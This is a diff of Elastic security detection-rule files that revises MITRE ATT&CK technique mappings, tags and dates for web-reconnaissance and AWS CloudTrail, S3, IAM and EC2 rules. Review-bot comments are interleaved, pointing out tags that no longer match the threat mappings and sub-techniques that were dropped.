diff --git a/rules/cross-platform/reconnaissance_web_server_discovery_or_fuzzing_activity.toml b/rules/cross-platform/reconnaissance_web_server_discovery_or_fuzzing_activity.toml
index 6f708721b17..a21ef09d5a0 100644
--- a/rules/cross-platform/reconnaissance_web_server_discovery_or_fuzzing_activity.toml
+++ b/rules/cross-platform/reconnaissance_web_server_discovery_or_fuzzing_activity.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/11/19"
 integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/03/19"
 
 [rule]
 author = ["Elastic"]
@@ -105,6 +105,11 @@ id = "T1595"
 name = "Active Scanning"
 reference = "https://attack.mitre.org/techniques/T1595/"
 
+[[rule.threat.technique.subtechnique]]
+id = "T1595.002"
+name = "Vulnerability Scanning"
+reference = "https://attack.mitre.org/techniques/T1595/002/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1595.003"
 name = "Wordlist Scanning"
diff --git a/rules/cross-platform/reconnaissance_web_server_unusual_spike_in_error_logs.toml b/rules/cross-platform/reconnaissance_web_server_unusual_spike_in_error_logs.toml
index a0d76d21725..6e1a850949f 100644
--- a/rules/cross-platform/reconnaissance_web_server_unusual_spike_in_error_logs.toml
+++ b/rules/cross-platform/reconnaissance_web_server_unusual_spike_in_error_logs.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/11/19"
 integration = ["nginx", "apache", "apache_tomcat", "iis"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/05"
 
 [rule]
 author = ["Elastic"]
@@ -99,6 +99,11 @@ id = "T1595.002"
 name = "Vulnerability Scanning"
 reference = "https://attack.mitre.org/techniques/T1595/002/"
 
+[[rule.threat.technique.subtechnique]]
+id = "T1595.003"
+name = "Wordlist Scanning"
+reference = "https://attack.mitre.org/techniques/T1595/003/"
+
 [rule.threat.tactic]
 id = "TA0043"
 name = "Reconnaissance"
diff --git a/rules/cross-platform/reconnaissance_web_server_unusual_spike_in_error_response_codes.toml b/rules/cross-platform/reconnaissance_web_server_unusual_spike_in_error_response_codes.toml
index 0f3c8e22610..474e146dc74 100644
--- a/rules/cross-platform/reconnaissance_web_server_unusual_spike_in_error_response_codes.toml
+++ b/rules/cross-platform/reconnaissance_web_server_unusual_spike_in_error_response_codes.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/11/19"
 integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/03/19"
 
 [rule]
 author = ["Elastic"]
@@ -117,6 +117,11 @@ id = "T1595.002"
 name = "Vulnerability Scanning"
 reference = "https://attack.mitre.org/techniques/T1595/002/"
 
+[[rule.threat.technique.subtechnique]]
+id = "T1595.003"
+name = "Wordlist Scanning"
+reference = "https://attack.mitre.org/techniques/T1595/003/"
+
 [rule.threat.tactic]
 id = "TA0043"
 name = "Reconnaissance"
diff --git a/rules/cross-platform/reconnaissance_web_server_unusual_user_agents.toml b/rules/cross-platform/reconnaissance_web_server_unusual_user_agents.toml
index e2c8e39c56d..f98e838dc84 100644
--- a/rules/cross-platform/reconnaissance_web_server_unusual_user_agents.toml
+++ b/rules/cross-platform/reconnaissance_web_server_unusual_user_agents.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/11/19"
 integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/03/19"
 
 [rule]
 author = ["Elastic"]
@@ -50,7 +50,18 @@ This rule flags surges of web requests that advertise scanner or brute-force too
 risk_score = 21
 rule_id = "a1b7ffa4-bf80-4bf1-86ad-c3f4dc718b35"
 severity = "low"
-tags = ["Domain: Web", "Use Case: Threat Detection", "Tactic: Reconnaissance", "Data Source: Nginx", "Data Source: Apache", "Data Source: Apache Tomcat", "Data Source: IIS", "Data Source: Traefik", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Web",
+ "Use Case: Threat Detection",
+ "Tactic: Reconnaissance",
+ "Tactic: Credential Access",
+ "Data Source: Nginx",
+ "Data Source: Apache",
+ "Data Source: Apache Tomcat",
+ "Data Source: IIS",
+ "Data Source: Traefik",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "esql"
 query = '''
@@ -115,6 +126,11 @@ id = "T1595"
 name = "Active Scanning"
 reference = "https://attack.mitre.org/techniques/T1595/"
 
+[[rule.threat.technique.subtechnique]]
+id = "T1595.001"
+name = "Scanning IP Blocks"
+reference = "https://attack.mitre.org/techniques/T1595/001/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1595.002"
 name = "Vulnerability Scanning"
@@ -129,3 +145,16 @@ reference = "https://attack.mitre.org/techniques/T1595/003/"
 id = "TA0043"
 name = "Reconnaissance"
 reference = "https://attack.mitre.org/tactics/TA0043/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1110"
+name = "Brute Force"
+reference = "https://attack.mitre.org/techniques/T1110/"
+
+[rule.threat.tactic]
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
diff --git a/rules/integrations/aws/collection_cloudtrail_logging_created.toml b/rules/integrations/aws/collection_cloudtrail_logging_created.toml
index 839ce6d42d9..21998af8115 100644
--- a/rules/integrations/aws/collection_cloudtrail_logging_created.toml
+++ b/rules/integrations/aws/collection_cloudtrail_logging_created.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/06/10"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/16"
 
 [rule]
 author = ["Elastic"]
@@ -69,7 +69,15 @@ references = [
 risk_score = 21
 rule_id = "594e0cbf-86cc-45aa-9ff7-ff27db27d3ed"
 severity = "low"
-tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Cloudtrail", "Use Case: Log Auditing", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Data Source: AWS",
+ "Data Source: Amazon Web Services",
+ "Data Source: AWS Cloudtrail",
+ "Use Case: Log Auditing",
+ "Tactic: Collection",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "query"
 
@@ -83,21 +91,17 @@ event.dataset: "aws.cloudtrail"
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1562"
-name = "Impair Defenses"
-reference = "https://attack.mitre.org/techniques/T1562/"
+id = "T1530"
+name = "Data from Cloud Storage"
+reference = "https://attack.mitre.org/techniques/T1530/"
 
-[[rule.threat.technique.subtechnique]]
-id = "T1562.008"
-name = "Disable or Modify Cloud Logs"
-reference = "https://attack.mitre.org/techniques/T1562/008/"
 
 [rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
+
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/collection_s3_unauthenticated_bucket_access_by_rare_source.toml b/rules/integrations/aws/collection_s3_unauthenticated_bucket_access_by_rare_source.toml
index 8faabf103c2..d649ef077c5 100644
--- a/rules/integrations/aws/collection_s3_unauthenticated_bucket_access_by_rare_source.toml
+++ b/rules/integrations/aws/collection_s3_unauthenticated_bucket_access_by_rare_source.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/12/17"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/16"
 
 [rule]
 author = ["Elastic"]
@@ -92,7 +92,15 @@ risk_score = 47
 rule_id = "59bf26c2-bcbe-11ef-a215-f661ea17fbce"
 setup = "S3 data events must be enabled in CloudTrail to capture the GetObject, PutObject, ListObjects, and DeleteObject actions. Ensure that the AWS CloudTrail service is configured to log data events for the S3 bucket you'd like to monitor."
 severity = "medium"
-tags = ["Domain: Cloud", "Tactic: Collection", "Tactic: Discovery", "Tactic: Impact", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: Amazon S3", "Use Case: Asset Visibility", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Data Source: AWS",
+ "Data Source: Amazon Web Services",
+ "Data Source: Amazon S3",
+ "Use Case: Asset Visibility",
+ "Resources: Investigation Guide",
+ "Tactic: Collection",
+]
 timestamp_override = "event.ingested"
 type = "new_terms"
 
@@ -113,42 +121,42 @@ event.dataset: "aws.cloudtrail"
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1530"
 name = "Data from Cloud Storage"
 reference = "https://attack.mitre.org/techniques/T1530/"
+
 
 [rule.threat.tactic]
 id = "TA0009"
 name = "Collection"
 reference = "https://attack.mitre.org/tactics/TA0009/"
-
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1619"
 name = "Cloud Storage Object Discovery"
 reference = "https://attack.mitre.org/techniques/T1619/"
+
 
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
-
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1485"
 name = "Data Destruction"
 reference = "https://attack.mitre.org/techniques/T1485/"
+
 
 [rule.threat.tactic]
 id = "TA0040"
 name = "Impact"
 reference = "https://attack.mitre.org/tactics/TA0040/"
+
+
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
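Review bot: The `@@ -92,7 +92,15 @@` hunk drops `"Tactic: Discovery"` and `"Tactic: Impact"` from `tags`, but the `@@ -113,42 +121,42 @@` hunk below keeps the T1619/Discovery and T1485/Impact entries untouched apart from blank lines, so two of the three mapped tactics no longer have a tag. Either restore the two tags or remove the corresponding `[[rule.threat]]` entries so the tags and the threat mapping agree; the tag/threat check in this series' test changes would report both as missing `Tactic:` tags. Moving `"Tactic: Collection"` to the end of the list, after `Resources:`, also breaks the ordering every other rebuilt `tags` array in this change follows.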
diff --git a/rules/integrations/aws/credential_access_aws_getpassword_for_ec2_instance.toml b/rules/integrations/aws/credential_access_aws_getpassword_for_ec2_instance.toml
index 244fef8f9cb..7bf37ce9e83 100644
--- a/rules/integrations/aws/credential_access_aws_getpassword_for_ec2_instance.toml
+++ b/rules/integrations/aws/credential_access_aws_getpassword_for_ec2_instance.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/04/10"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/06/04"
 
 [rule]
 author = ["Elastic"]
@@ -95,16 +95,22 @@ field_names = [
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1552"
 name = "Unsecured Credentials"
 reference = "https://attack.mitre.org/techniques/T1552/"
+[[rule.threat.technique.subtechnique]]
+id = "T1552.005"
+name = "Cloud Instance Metadata API"
+reference = "https://attack.mitre.org/techniques/T1552/005/"
+
+
 
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["aws.cloudtrail.user_identity.session_context.session_issuer.arn"]
diff --git a/rules/integrations/aws/credential_access_iam_user_addition_to_group.toml b/rules/integrations/aws/credential_access_iam_user_addition_to_group.toml
index 5d27f5e2070..d134a095da1 100644
--- a/rules/integrations/aws/credential_access_iam_user_addition_to_group.toml
+++ b/rules/integrations/aws/credential_access_iam_user_addition_to_group.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/06/04"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/16"
 
 [rule]
 author = ["Elastic"]
@@ -74,7 +74,15 @@ references = ["https://docs.aws.amazon.com/IAM/latest/APIReference/API_AddUserTo
 risk_score = 21
 rule_id = "333de828-8190-4cf5-8d7c-7575846f6fe0"
 severity = "low"
-tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Data Source: AWS",
+ "Data Source: Amazon Web Services",
+ "Use Case: Identity and Access Audit",
+ "Tactic: Credential Access",
+ "Tactic: Persistence",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "query"
@@ -89,28 +97,23 @@ event.dataset: aws.cloudtrail and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[rule.threat.tactic]
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/credential_access_root_console_failure_brute_force.toml b/rules/integrations/aws/credential_access_root_console_failure_brute_force.toml
index d744ecf6047..2fd99ea0bd8 100644
--- a/rules/integrations/aws/credential_access_root_console_failure_brute_force.toml
+++ b/rules/integrations/aws/credential_access_root_console_failure_brute_force.toml
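Review bot: The new first `[[rule.threat]]` entry for Credential Access (TA0006) carries a tactic but no `[[rule.threat.technique]]`, and the Privilege Escalation entry (TA0004 with T1098) is removed outright. A tactic-only entry is weaker than the mapping it replaces: if a technique motivates the Credential Access tag, add it under this entry; if none fits, the tactic and the matching `"Tactic: Credential Access"` tag in the previous hunk are hard to justify. The `exfiltration_rds_snapshot_export.toml` hunk (`@@ -151,38 +151,28 @@`) has the same shape, where the Exfiltration entry loses `T1567`/`T1567.002` and keeps only the tactic.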
@@ -2,7 +2,7 @@
 creation_date = "2020/07/21"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/16"
 [rule]
 author = ["Elastic"]
@@ -132,21 +132,17 @@ field_names = [
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1110"
 name = "Brute Force"
 reference = "https://attack.mitre.org/techniques/T1110/"
-[[rule.threat.technique.subtechnique]]
-id = "T1110.001"
-name = "Password Guessing"
-reference = "https://attack.mitre.org/techniques/T1110/001/"
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
 [rule.threshold]
 field = ["cloud.account.id"]
 value = 10
diff --git a/rules/integrations/aws/defense_evasion_cloudtrail_logging_deleted.toml b/rules/integrations/aws/defense_evasion_cloudtrail_logging_deleted.toml
index 30221b5bef0..f762db3aa20 100644
--- a/rules/integrations/aws/defense_evasion_cloudtrail_logging_deleted.toml
+++ b/rules/integrations/aws/defense_evasion_cloudtrail_logging_deleted.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/05/26"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/21"
 [rule]
 author = ["Elastic"]
@@ -82,21 +82,22 @@ event.dataset: "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
-
 [[rule.threat.technique.subtechnique]]
-id = "T1562.008"
-name = "Disable or Modify Cloud Logs"
-reference = "https://attack.mitre.org/techniques/T1562/008/"
+id = "T1562.001"
+name = "Disable or Modify Tools"
+reference = "https://attack.mitre.org/techniques/T1562/001/"
+
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
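Review bot: Removing the `T1110.001` "Password Guessing" sub-technique in the `@@ -132,21 +132,17 @@` hunk leaves this rule mapped only to the parent `T1110`, which loses precision for a threshold rule that counts failed root console sign-ins. Unless the rule was deliberately broadened beyond password guessing, keep the four-line `[[rule.threat.technique.subtechnique]]` block under `[[rule.threat.technique]]`.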
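Review bot: In the `defense_evasion_cloudtrail_logging_deleted.toml` hunk (`@@ -82,21 +82,22 @@`) the sub-technique changes from `T1562.008` "Disable or Modify Cloud Logs" to `T1562.001` "Disable or Modify Tools", yet the rule is about CloudTrail logging being deleted, which the removed sub-technique names directly. The identical swap is made in `defense_evasion_cloudtrail_logging_suspended.toml` (`@@ -83,21 +83,22 @@`), and `T1562.008` is still being added to other rules in this same series (e.g. `defense_evasion_config_service_rule_deletion.toml`), so the sub-technique is clearly still in use. Unless there is a reason to treat CloudTrail as a "tool" rather than a log source, restoring `id = "T1562.008"`, `name = "Disable or Modify Cloud Logs"` and the matching reference in both files keeps the mapping precise.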
diff --git a/rules/integrations/aws/defense_evasion_cloudtrail_logging_suspended.toml b/rules/integrations/aws/defense_evasion_cloudtrail_logging_suspended.toml
index 1955e7dfa15..b81501f12d9 100644
--- a/rules/integrations/aws/defense_evasion_cloudtrail_logging_suspended.toml
+++ b/rules/integrations/aws/defense_evasion_cloudtrail_logging_suspended.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/06/10"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/21"
 [rule]
 author = ["Elastic"]
@@ -83,21 +83,22 @@ event.dataset: "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
-
 [[rule.threat.technique.subtechnique]]
-id = "T1562.008"
-name = "Disable or Modify Cloud Logs"
-reference = "https://attack.mitre.org/techniques/T1562/008/"
+id = "T1562.001"
+name = "Disable or Modify Tools"
+reference = "https://attack.mitre.org/techniques/T1562/001/"
+
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/defense_evasion_cloudwatch_alarm_deletion.toml b/rules/integrations/aws/defense_evasion_cloudwatch_alarm_deletion.toml
index 166538416bc..3dedaf38d39 100644
--- a/rules/integrations/aws/defense_evasion_cloudwatch_alarm_deletion.toml
+++ b/rules/integrations/aws/defense_evasion_cloudwatch_alarm_deletion.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/06/15"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/21"
 [rule]
 author = ["Elastic"]
@@ -130,21 +130,27 @@ event.dataset: "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1562.001"
 name = "Disable or Modify Tools"
 reference = "https://attack.mitre.org/techniques/T1562/001/"
+[[rule.threat.technique.subtechnique]]
+id = "T1562.006"
+name = "Indicator Blocking"
+reference = "https://attack.mitre.org/techniques/T1562/006/"
+
+
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/defense_evasion_config_service_rule_deletion.toml b/rules/integrations/aws/defense_evasion_config_service_rule_deletion.toml
index 5e84d659e4b..8d37020dce8 100644
--- a/rules/integrations/aws/defense_evasion_config_service_rule_deletion.toml
+++ b/rules/integrations/aws/defense_evasion_config_service_rule_deletion.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/06/26"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/16"
 [rule]
 author = ["Elastic", "Austin Songer"]
@@ -129,21 +129,27 @@ event.dataset: aws.cloudtrail
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1562.001"
 name = "Disable or Modify Tools"
 reference = "https://attack.mitre.org/techniques/T1562/001/"
+[[rule.threat.technique.subtechnique]]
+id = "T1562.008"
+name = "Disable or Modify Cloud Logs"
+reference = "https://attack.mitre.org/techniques/T1562/008/"
+
+
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/defense_evasion_configuration_recorder_stopped.toml b/rules/integrations/aws/defense_evasion_configuration_recorder_stopped.toml
index 941c9de02dd..41c5766b582 100644
--- a/rules/integrations/aws/defense_evasion_configuration_recorder_stopped.toml
+++ b/rules/integrations/aws/defense_evasion_configuration_recorder_stopped.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/06/16"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/21"
 [rule]
 author = ["Elastic"]
@@ -109,21 +109,27 @@ event.dataset: aws.cloudtrail
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1562.001"
 name = "Disable or Modify Tools"
 reference = "https://attack.mitre.org/techniques/T1562/001/"
+[[rule.threat.technique.subtechnique]]
+id = "T1562.008"
+name = "Disable or Modify Cloud Logs"
+reference = "https://attack.mitre.org/techniques/T1562/008/"
+
+
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/defense_evasion_ec2_serial_console_access_enabled.toml b/rules/integrations/aws/defense_evasion_ec2_serial_console_access_enabled.toml
index 2543f7add08..67bc1c4472a 100644
--- a/rules/integrations/aws/defense_evasion_ec2_serial_console_access_enabled.toml
+++ b/rules/integrations/aws/defense_evasion_ec2_serial_console_access_enabled.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/02/05"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/02/05"
 [rule]
 author = ["Elastic"]
@@ -95,7 +95,14 @@ references = [
 risk_score = 73
 rule_id = "e9fe3645-f588-43d6-99f5-437b3ef56f25"
 severity = "high"
-tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Data Source: AWS",
+ "Data Source: Amazon Web Services",
+ "Data Source: AWS EC2",
+ "Tactic: Defense Evasion",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "query"
@@ -109,34 +116,22 @@ event.dataset: "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1578"
-name = "Modify Cloud Compute Infrastructure"
-reference = "https://attack.mitre.org/techniques/T1578/"
-
+id = "T1562"
+name = "Impair Defenses"
+reference = "https://attack.mitre.org/techniques/T1562/"
 [[rule.threat.technique.subtechnique]]
-id = "T1578.005"
-name = "Modify Cloud Compute Configurations"
-reference = "https://attack.mitre.org/techniques/T1578/005/"
+id = "T1562.001"
+name = "Disable or Modify Tools"
+reference = "https://attack.mitre.org/techniques/T1562/001/"
+
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1133"
-name = "External Remote Services"
-reference = "https://attack.mitre.org/techniques/T1133/"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/defense_evasion_rds_instance_restored.toml b/rules/integrations/aws/defense_evasion_rds_instance_restored.toml
index 9c3dc41b044..5c526fa7a83 100644
--- a/rules/integrations/aws/defense_evasion_rds_instance_restored.toml
+++ b/rules/integrations/aws/defense_evasion_rds_instance_restored.toml
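Review bot: In the `@@ -109,34 +116,22 @@` hunk the mapping replaces `T1578.005` "Modify Cloud Compute Configurations" and the Persistence entry `T1133` "External Remote Services" with `T1562.001` "Disable or Modify Tools". Enabling EC2 serial console access is a compute-configuration change that opens an extra access path, which is what the removed techniques named; "Disable or Modify Tools" is a loose fit unless the rule's description frames the action as tampering with a security control. Confirm the intent, and if Persistence still applies restore the `T1133` entry together with the `"Tactic: Persistence"` tag dropped in the previous hunk so tags and threat stay aligned.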
@@ -2,7 +2,7 @@
 creation_date = "2021/06/29"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/21"
 [rule]
 author = ["Austin Songer", "Elastic"]
@@ -131,7 +131,15 @@ references = [
 risk_score = 47
 rule_id = "bf1073bf-ce26-4607-b405-ba1ed8e9e204"
 severity = "medium"
-tags = ["Domain: Cloud", "Tactic: Collection", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS RDS", "Use Case: Asset Visibility", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Data Source: AWS",
+ "Data Source: Amazon Web Services",
+ "Data Source: AWS RDS",
+ "Use Case: Asset Visibility",
+ "Tactic: Defense Evasion",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "query"
@@ -145,34 +153,27 @@ event.dataset: "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1213"
-name = "Data from Information Repositories"
-reference = "https://attack.mitre.org/techniques/T1213/"
-
-[rule.threat.tactic]
-id = "TA0009"
-name = "Collection"
-reference = "https://attack.mitre.org/tactics/TA0009/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1578"
 name = "Modify Cloud Compute Infrastructure"
 reference = "https://attack.mitre.org/techniques/T1578/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1578.002"
 name = "Create Cloud Instance"
 reference = "https://attack.mitre.org/techniques/T1578/002/"
+[[rule.threat.technique.subtechnique]]
+id = "T1578.004"
+name = "Revert Cloud Instance"
+reference = "https://attack.mitre.org/techniques/T1578/004/"
+
+
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/defense_evasion_s3_bucket_configuration_deletion.toml b/rules/integrations/aws/defense_evasion_s3_bucket_configuration_deletion.toml
index 121aa4b0ea2..a3f2352b5a1 100644
--- a/rules/integrations/aws/defense_evasion_s3_bucket_configuration_deletion.toml
+++ b/rules/integrations/aws/defense_evasion_s3_bucket_configuration_deletion.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/05/27"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/16"
 [rule]
 author = ["Elastic"]
@@ -122,29 +122,39 @@ event.dataset:aws.cloudtrail and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1070"
+name = "Indicator Removal"
+reference = "https://attack.mitre.org/techniques/T1070/"
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
+[[rule.threat.technique.subtechnique]]
+id = "T1562.008"
+name = "Disable or Modify Cloud Logs"
+reference = "https://attack.mitre.org/techniques/T1562/008/"
+
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1490"
 name = "Inhibit System Recovery"
 reference = "https://attack.mitre.org/techniques/T1490/"
+
 [rule.threat.tactic]
 id = "TA0040"
 name = "Impact"
 reference = "https://attack.mitre.org/tactics/TA0040/"
+
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/defense_evasion_s3_bucket_lifecycle_expiration_added.toml b/rules/integrations/aws/defense_evasion_s3_bucket_lifecycle_expiration_added.toml
index d9ffd7ed065..d7bf8608f45 100644
--- a/rules/integrations/aws/defense_evasion_s3_bucket_lifecycle_expiration_added.toml
+++ b/rules/integrations/aws/defense_evasion_s3_bucket_lifecycle_expiration_added.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/04/12"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/16"
 [rule]
 author = ["Elastic"]
@@ -118,7 +118,15 @@ references = [
 risk_score = 21
 rule_id = "ff320c56-f8fa-11ee-8c44-f661ea17fbce"
 severity = "low"
